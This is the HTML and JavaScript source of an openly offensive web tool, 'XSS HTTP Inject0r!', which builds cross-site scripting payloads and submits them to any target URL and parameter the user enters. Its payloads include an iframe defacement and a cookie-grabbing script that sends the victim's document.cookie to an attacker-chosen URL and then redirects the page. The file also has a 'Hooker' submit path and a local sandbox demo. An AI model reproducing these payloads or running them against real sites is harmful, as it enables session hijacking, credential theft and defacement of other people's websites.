xss-http-injector/index.html

<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en">
<head><title>XSS HTTP Inject0r!</title>
<meta http-equiv="content-type" content="text/html;charset=utf-8"> 
<link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon"> 
<style type="text/css">
<!--
body,td,th {
color: #FFFFFF;
}
body {
background-color: #000000;
}
a {
 color:lime;
}
-->
</style>
<script type="text/javascript">
var alertbox = "<BODY ONLOAD=alert('1')>";
var marquee = "<marquee>0wned!</marquee>";
var cookie = "<ScRIPt>alert(document.cookie);<\/ScRiPt>";
var iframe = "<iFrAmE src='../images/pwned.jpg' scrolling=no frameborder=0 width='812' height='576'><\/iFrAmE>";
window.onload = function() {
    document.getElementById('use_custom').style.display = 'none';
    document.getElementById('cookie_grab_script_div').style.display = 'none';
    document.getElementById('get_poc').style.display = 'block';
    document.getElementById('post_poc').style.display = 'none';
}
function SetMethod(frm){
 if (document.getElementById('get').checked){
         document.getElementById('post_poc').style.display = 'none';
         document.getElementById('get_poc').style.display = 'block';
         document.poc.method="GET";
     }
     else{
         document.getElementById('post_poc').style.display = 'block';
         document.getElementById('get_poc').style.display = 'none';
         document.poc.method="POST";
     }
}
function SetScenario(frm){
prefix = frm.prefix.value;
custom_value = frm.custom_injection.value;
cookie_grab_script=frm.cookie_grab_script.value;
  if (frm.target.value == ""){
     alert("Hey! Where is your target?")
     return false;
     }
  else if (frm.vulnerability.value == ""){ 
     alert("You should enter a vulnerable parameter")
     return false;
     }
     document.poc.action=frm.target.value;
     document.getElementById('lulz').name=frm.vulnerability.value;
     if(document.getElementById('alertbox').checked) {
     document.getElementById('lulz').value=prefix+alertbox;
     }
     if(document.getElementById('marquee').checked) {
     document.getElementById('lulz').value=prefix+marquee;
     }
     if(document.getElementById('cookie').checked) {
     document.getElementById('lulz').value=prefix+cookie;
     }
     if(document.getElementById('iframe').checked) {
     document.getElementById('lulz').value=prefix+iframe;
     }
     if(document.getElementById('custom').checked) {
     document.getElementById('lulz').value=prefix+custom_value;
     }
     if(document.getElementById('cookie_grab').checked){ 
     document.getElementById('lulz').value=prefix+unescape("%3CScRiPt%3Edocument.write%28%22%3Cimg%20src=%27")+cookie_grab_script+unescape("?%22%2bescape%28document.cookie%29%2b%22%27%3E%22%29")+";document.location='http://google.com';"+unescape("%3c%2FScRiPt%3E");

     }
     document.poc.submit();
}
function SetHook(frm){
target = frm.target.value;
vulnerability = frm.vulnerability.value;
prefix = frm.prefix.value;
custom_value = frm.custom_injection.value;
custom_cookie_url = frm.cookie_grab_script.value;
  if (target == ""){
     alert("Hey! Where is your target?")
     return false;
     }
  else if (vulnerability == ""){
     alert("You should enter a vulnerable parameter")
     return false;
     }
     if(document.getElementById('alertbox').checked) {
     injection = prefix+alertbox;
     }
     if(document.getElementById('marquee').checked) {
     injection = prefix+marquee;
     }
     if(document.getElementById('cookie').checked) {
     injection = prefix+cookie;
     }
     if(document.getElementById('cookie_grab').checked) {
     injection = prefix+unescape("%3CScRiPt%3Edocument.write%28%22%3Cimg%20src=%27")+custom_cookie_url+unescape("?%22%2bescape%28document.cookie%29%2b%22%27%3E%22%29")+";document.location='http://google.com';"+unescape("%3C%2FScRiPt%3E");
     }
     if(document.getElementById('iframe').checked) {
     injection = prefix+iframe;
     }
     if(document.getElementById('custom').checked) {
     injection = prefix+custom_value;
     }
     document.getElementById('injection').value=injection;
     document.poc.action="hooker.php";
     document.poc.submit();
}
function SetScript(frm) {
	document.getElementById('use_custom').style.display = 'none';
	document.getElementById('cookie_grab_script_div').style.display = 'none';
        document.getElementById('line1').style.display = 'none';
    if (document.getElementById('custom').checked) {
        document.getElementById('use_custom').style.display = 'block';
        document.getElementById('line1').style.display = 'block';
    }else if (document.getElementById('cookie_grab').checked) {
        document.getElementById('cookie_grab_script_div').style.display = 'block';
        document.getElementById('line1').style.display = 'block';
    }
}
function LoadPoc(m,target,vuln,prefix,cook_grab_scr){
	if(m=="GET"){
		document.getElementById("get").checked=true;
	}else{
		document.getElementById("post").checked=true;
	}
	document.getElementById("target").value=target;
	document.getElementById("vulnerability").value=vuln;
	document.getElementById("prefix").value=unescape(prefix);
	document.getElementById("cookie_grab_script").value=cook_grab_scr;
}
var cans=Array();
var frame=0;
var vStickLength=0.6*(-5+18*Math.random());
var vStickWidth=0.5+5*Math.random();
var vIncX=Math.random()*80+20;
var blocks=Array();
function Egg(){
        window.scrollBy(0,100);
	var canvas = document.createElement('canvas');
	canvas.id = "CursorLayer";
	canvas.width  = 250;
	canvas.height = 46;
	canvas.style.zIndex = -2;
	canvas.style.position = "relative";
	canvas.style.padding = 5;
	canvas.style.top = 0; 
	canvas.style.border = "1px solid";
	var context = canvas.getContext('2d');
	if(frame<55){
	canvas.style.background = 'rgba('+parseInt(Math.random()*8+30)+','+parseInt(Math.random()*8+30)+','+parseInt(100+Math.random()*155)+',1)';
	context.font = 'italic 20pt Calibri';
	context.fillStyle='rgba('+parseInt(Math.random()*25)+','+parseInt(Math.random()*25)+','+parseInt(Math.random()*25)+',1)';
	context.fillText('BigBrother!!!', 20, 30);
	}else{
	canvas.style.background = 'lime';
        context.font = 'italic 20pt Courier';
        context.fillStyle='black';
	luck=Array("Remember","Use", "Squat", "Think", "Mayh3m!", "Hell!", "Destroy", "Fight", "Big Brother!", "Shit", "The", "Crypto", "Anarchy", "Truth", "Out", "Ilegal", "Hack", "CCTV", "XSS", "Satellite", "SlaveMaster", "Money", "Bitcoin", "Will be")
        context.fillText(luck[parseInt(luck.length*Math.random())], 20, 30);
	}
	if(frame<60) {
		b=document.body.appendChild(canvas);
		if(frame<60) blocks.push(b);
	}else{
		if(typeof blocks[frame-60]!="undefined") blocks[frame-60].style.display="none";
	}
	var canvas = document.createElement('canvas');
	canvas.style.zIndex   = -666;
	canvas.width = 360;
	canvas.height = 598;
	canvas.style.position = "fixed";
        canvas.style.left=((frame*vIncX)%1024)+"px";
	canvas.style.top="10px";
	cans[frame]=canvas;
	document.body.appendChild(canvas);
	var ctx = canvas.getContext('2d');
	ctx.moveTo(-15+Math.random(50),20);
	for(i=0;i<5;i++){
	ctx.strokeStyle = 'rgba('+parseInt(Math.random()*255)+','+parseInt(Math.random()*255)+','+parseInt(Math.random()*255)+',0.1)';
	ctx.lineWidth=3;
	ctx.strokeStyle='rgba('+parseInt(Math.random()*255)+','+parseInt(Math.random()*255)+','+parseInt(Math.random()*255)+',0.4)';
        ctx.beginPath();
	cx=60+100*Math.random();
	cy=50+400*Math.random();
      	ctx.arc(cx,cy, i*8.5, 0, 2 * Math.PI, false);
	ctx.fill();
	ctx.strokeStyle='rgba('+parseInt(Math.random()*255)+','+parseInt(Math.random()*255)+','+parseInt(Math.random()*255)+',0.1)';
	ctx.fillStyle = 'rgba('+parseInt(Math.random()*255)+','+parseInt(Math.random()*255)+','+parseInt(Math.random()*255)+',0.1)';
	ctx.arc(cx*vStickWidth,cy*vStickLength, i*2.5, 0, 2 * Math.PI, false);
        ctx.fill();
        ctx.lineWidth = i/6;
        ctx.strokeStyle = '#aa3300';
	if(!(frame%5)){
		for(j=0;j<=cans.length;j++){
			if(typeof cans[j] === 'undefined') continue;
			ctx=cans[j].getContext("2d");
			ctx.strokeStyle = 'rgba('+parseInt(Math.random()*255)+','+parseInt(Math.random()*255)+','+parseInt(Math.random()*255)+',1)';
		}
	}
}
setTimeout('Egg()', 200);
frame++;
}
</script>
</head><body>
<center>
 <table>
   <tr valign="middle">
     <td align="center">
<br /><h2><a href="https://github.com/epsylon/xss-http-injector" target="_blank">XSS HTTP Inject0r!</a></h2> - 2014 - <a href="http://gplv3.fsf.org" target="_blank">GPLv3</a><br /><font size=-1><a style="text-decoration:none;" href=# onClick=javascript:Egg()>"little rabbit"</a> version</font>
      </td>
     <td>
<img hspace="10" src="images/pwned.jpg" width="350" height="203" border="1"><br />
     </td>
    </tr>
 </table>
<hr>
<form name="poc">
<table>
 <tr>
  <td><u>Method</u> (HTTP method):</td><td><table><tr><td><input type="radio" name="method" id="get" onclick="javascript:SetMethod();" checked value="GET">GET</td><td><input type="radio" name="method" id="post" onclick="javascript:SetMethod(this.form);" value="POST">POST</td></tr></table></td>
 </tr>
 <tr>
 <td colspan=2>
<hr><script>var l=""+document.location;l=l.replace(/(.*)\/.*/,"$1/home.php")</script>
<label id="get_poc"><b>PoC</b> -> Target: <i>sandbox/search.php</i> -> Vuln.: <i>search_text</i> -> Vector: <i>"></i> | <a href="sandbox/get.html" target="_blank">SandBoX (HTTP-GET)</a> | <a onClick="javascript:LoadPoc('GET','sandbox/search.php','search_text','%22>',l)" href=#>Load PoC</a></label>
<label id="post_poc"><b>PoC</b> -> Target: <i>sandbox/search.php</i> -> Vuln.: <i>search_text</i> -> Vector: <i>"></i> | <a href="sandbox/post.html" target="_blank">SandBoX (HTTP-POST)</a> | <a onClick="javascript:LoadPoc('POST','sandbox/search.php','search_text','%22>',l)" href=#>Load PoC</a></label>
<hr>
</td>
 </tr>
 <tr>
 <td><u>Target</u> (Url to target's form):</td><td><input type="text" name="target" size="35" id="target"> (<i>ex: http://vulnsite.com/contact.php</i>)</td>
 </tr>
 <tr>
  <td><u>Vulnerability</u> (Vulnerable parameter):</td><td><input type="text" name="vulnerability" id="vulnerability"> (<i>ex: contact_email</i>)</td>
 </tr>
 <tr>
  <td><u>Vector</u> (Code prefix to inject):</td><td><input type="text" name="prefix" size="35" id="prefix"> (<i>ex: "></i>)</td>
 </tr>
</table>
<hr>
<table border="1" cellpadding="6" cellspacing="6">
 <tr>
  <td>JS Alert</td><td> <input type="radio" name="exploit" id="alertbox" onclick="javascript:SetScript();" checked></td>
  <td>Cookie Popup</td><td> <input type="radio" name="exploit" id="cookie" onclick="javascript:SetScript();" /></td>
  <td>HTML Marquee</td><td> <input type="radio" name="exploit" id="marquee" onclick="javascript:SetScript();" /></td>
  <td>Cookie Grabbing</td><td> <input type="radio" name="exploit" id="cookie_grab" onclick="javascript:SetScript();" /></td>
  <td>Defacement</td><td> <input type="radio" name="exploit" id="iframe" onclick="javascript:SetScript();" /></td>
  <td>Custom Script</td><td> <input type="radio" name="exploit" id="custom" onclick="javascript:SetScript();" /></td>
 </tr>
</table>
<hr id="line1" style="display:none">
<div id="use_custom" style="display:none">
 Custom injection: <input type="text" name="custom_injection" size="92">
</div>
<div id="cookie_grab_script_div" style="display:none">
 Grabbing URL: <input type="text" id="cookie_grab_script" name="cookie_grab_script" size="92">
</div>
<hr>
  <input type="hidden" id="lulz"></input>
  <input type="hidden" name="injection" id="injection"></input>
<table cellpadding="6" cellspacing="6" border="0">
 <tr>
  <td><input type="submit" value="Inject!" onClick="return SetScenario(this.form)" style="padding: 10px; font-weight:bold;"></td>
  <td><input type="submit" value="Hooker" onClick="return SetHook(this.form)" style="padding: 10px; font-weight:bold;"></td>
 </tr>
</table>
</form>
</body>
</html>